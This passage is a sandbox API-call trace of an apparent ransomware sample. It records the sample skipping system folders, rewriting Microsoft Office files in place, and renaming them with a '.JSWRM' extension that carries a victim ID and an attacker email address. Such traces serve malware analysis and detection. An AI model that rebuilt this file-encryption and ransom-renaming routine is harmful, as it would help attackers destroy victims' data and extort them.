returned 1 [0114.748] lstrcmpiW (lpString1="MSO.ACL", lpString2="windows") returned -1 [0114.748] lstrcmpiW (lpString1="MSO.ACL", lpString2="recovery") returned -1 [0114.748] lstrcmpiW (lpString1="MSO.ACL", lpString2="perflogs") returned -1 [0114.748] lstrcmpiW (lpString1="MSO.ACL", lpString2="documents and settings") returned 1 [0114.748] lstrcmpiW (lpString1="MSO.ACL", lpString2="$RECYCLE.BIN") returned 1 [0114.748] lstrcmpiW (lpString1="MSO.ACL", lpString2="system volume information") returned -1 [0114.748] lstrcmpiW (lpString1="MSO.ACL", lpString2="msocache") returned -1 [0114.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSO.ACL", lpUsedDefaultChar=0x0) returned 7 [0114.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSO.ACL", lpUsedDefaultChar=0x0) returned 7 [0114.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0114.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0114.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0114.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mso.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.749] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37730) returned 1 [0114.749] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9360) returned 0x24c1d0 [0114.749] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x9360, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x9360, lpOverlapped=0x0) returned 1 [0114.753] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.753] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x9360, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x9360, lpOverlapped=0x0) returned 1 [0114.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.755] CloseHandle (hObject=0x238) returned 1 [0114.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0114.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0114.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0114.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0114.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0114.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.755] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mso.acl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSO.ACL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mso.acl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0114.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0114.756] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf10a1263, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf12b7378, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6078, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="msotdintl.dll", cAlternateFileName="MSOTDI~1.DLL")) returned 1 [0114.756] lstrcmpiW (lpString1="msotdintl.dll", lpString2=".") returned 1 [0114.756] lstrcmpiW (lpString1="msotdintl.dll", lpString2="..") returned 1 [0114.756] lstrcmpiW (lpString1="msotdintl.dll", lpString2="...") returned 1 [0114.756] lstrcmpiW (lpString1="msotdintl.dll", lpString2="windows") returned -1 [0114.756] lstrcmpiW (lpString1="msotdintl.dll", lpString2="recovery") returned -1 [0114.756] lstrcmpiW (lpString1="msotdintl.dll", lpString2="perflogs") returned -1 [0114.756] lstrcmpiW (lpString1="msotdintl.dll", lpString2="documents and settings") returned 1 [0114.756] lstrcmpiW (lpString1="msotdintl.dll", lpString2="$RECYCLE.BIN") returned 1 [0114.756] lstrcmpiW (lpString1="msotdintl.dll", lpString2="system volume information") returned -1 [0114.756] lstrcmpiW (lpString1="msotdintl.dll", lpString2="msocache") returned 1 [0114.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0114.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotdintl.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotdintl.dll", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msotdintl.dll", lpUsedDefaultChar=0x0) returned 13 [0114.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0114.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0114.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotdintl.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotdintl.dll", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msotdintl.dll", lpUsedDefaultChar=0x0) returned 13 [0114.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0114.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0114.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0114.757] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xef93c032, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef93c032, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xef93c032, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb2c0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="msotelemetryintl.dll", cAlternateFileName="MSOTEL~1.DLL")) returned 1 [0114.757] lstrcmpiW (lpString1="msotelemetryintl.dll", lpString2=".") returned 1 [0114.757] lstrcmpiW (lpString1="msotelemetryintl.dll", lpString2="..") returned 1 [0114.757] lstrcmpiW (lpString1="msotelemetryintl.dll", lpString2="...") returned 1 [0114.757] lstrcmpiW (lpString1="msotelemetryintl.dll", lpString2="windows") returned -1 [0114.757] lstrcmpiW (lpString1="msotelemetryintl.dll", lpString2="recovery") returned -1 [0114.757] lstrcmpiW (lpString1="msotelemetryintl.dll", lpString2="perflogs") returned -1 [0114.757] lstrcmpiW (lpString1="msotelemetryintl.dll", lpString2="documents and settings") returned 1 [0114.757] lstrcmpiW (lpString1="msotelemetryintl.dll", lpString2="$RECYCLE.BIN") returned 1 [0114.757] lstrcmpiW (lpString1="msotelemetryintl.dll", lpString2="system volume information") returned -1 [0114.757] lstrcmpiW (lpString1="msotelemetryintl.dll", lpString2="msocache") returned 1 [0114.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotelemetryintl.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0114.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotelemetryintl.dll", cchWideChar=20, lpMultiByteStr=0x241038, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msotelemetryintl.dll", lpUsedDefaultChar=0x0) returned 20 [0114.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotelemetryintl.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0114.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msotelemetryintl.dll", cchWideChar=20, lpMultiByteStr=0x240fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msotelemetryintl.dll", lpUsedDefaultChar=0x0) returned 20 [0114.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0114.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0114.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0114.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0114.757] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3143659, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf3143659, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9b8364e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d0b0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSOUC.HXS", cAlternateFileName="")) returned 1 [0114.757] lstrcmpiW (lpString1="MSOUC.HXS", lpString2=".") returned 1 [0114.757] lstrcmpiW (lpString1="MSOUC.HXS", lpString2="..") returned 1 [0114.758] lstrcmpiW (lpString1="MSOUC.HXS", lpString2="...") returned 1 [0114.758] lstrcmpiW (lpString1="MSOUC.HXS", lpString2="windows") returned -1 [0114.758] lstrcmpiW (lpString1="MSOUC.HXS", lpString2="recovery") returned -1 [0114.758] lstrcmpiW (lpString1="MSOUC.HXS", lpString2="perflogs") returned -1 [0114.758] lstrcmpiW (lpString1="MSOUC.HXS", lpString2="documents and settings") returned 1 [0114.758] lstrcmpiW (lpString1="MSOUC.HXS", lpString2="$RECYCLE.BIN") returned 1 [0114.758] lstrcmpiW (lpString1="MSOUC.HXS", lpString2="system volume information") returned -1 [0114.758] lstrcmpiW (lpString1="MSOUC.HXS", lpString2="msocache") returned 1 [0114.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0114.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC.HXS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC.HXS", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC.HXS", lpUsedDefaultChar=0x0) returned 9 [0114.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0114.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0114.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC.HXS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC.HXS", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC.HXS", lpUsedDefaultChar=0x0) returned 9 [0114.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0114.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0114.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0114.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0114.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.760] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=184496) returned 1 [0114.760] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0114.760] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0114.877] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.878] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0114.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.878] CloseHandle (hObject=0x238) returned 1 [0114.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0114.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0114.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0114.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0114.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0114.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.879] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0114.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0114.880] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9b5d49a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9b5d49a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9b8364e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSOUC_COL.HXC", cAlternateFileName="MSOUC_~1.HXC")) returned 1 [0114.880] lstrcmpiW (lpString1="MSOUC_COL.HXC", lpString2=".") returned 1 [0114.881] lstrcmpiW (lpString1="MSOUC_COL.HXC", lpString2="..") returned 1 [0114.881] lstrcmpiW (lpString1="MSOUC_COL.HXC", lpString2="...") returned 1 [0114.881] lstrcmpiW (lpString1="MSOUC_COL.HXC", lpString2="windows") returned -1 [0114.881] lstrcmpiW (lpString1="MSOUC_COL.HXC", lpString2="recovery") returned -1 [0114.881] lstrcmpiW (lpString1="MSOUC_COL.HXC", lpString2="perflogs") returned -1 [0114.881] lstrcmpiW (lpString1="MSOUC_COL.HXC", lpString2="documents and settings") returned 1 [0114.881] lstrcmpiW (lpString1="MSOUC_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0114.881] lstrcmpiW (lpString1="MSOUC_COL.HXC", lpString2="system volume information") returned -1 [0114.881] lstrcmpiW (lpString1="MSOUC_COL.HXC", lpString2="msocache") returned 1 [0114.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0114.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_COL.HXC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_COL.HXC", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_COL.HXC", lpUsedDefaultChar=0x0) returned 13 [0114.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0114.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0114.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_COL.HXC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_COL.HXC", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_COL.HXC", lpUsedDefaultChar=0x0) returned 13 [0114.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0114.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0114.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0114.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0114.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.882] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=631) returned 1 [0114.882] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0114.882] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, 